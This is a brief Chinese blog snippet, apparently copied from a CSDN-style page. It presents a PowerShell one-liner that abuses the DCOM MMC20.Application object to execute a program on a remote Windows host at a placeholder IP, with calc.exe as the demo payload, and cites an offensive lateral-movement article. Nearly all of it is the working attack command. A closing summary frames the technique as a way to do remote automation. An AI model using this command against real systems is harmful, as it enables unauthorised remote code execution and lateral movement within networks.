[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","这里替换成你的IP")).Document.ActiveView.ExecuteShellCommand("C:\Windows\System32\Calc.exe","0","0","0")
效果:

参考链接:https://hausec.com/2019/08/12/offensive-lateral-movement/
本文介绍了一种使用MMC20.Application对象从远程位置执行命令的方法,通过创建实例并调用ExecuteShellCommand方法来运行指定的程序。这种方法可用于实现远程操作或自动化任务。
1131

被折叠的 条评论
为什么被折叠?



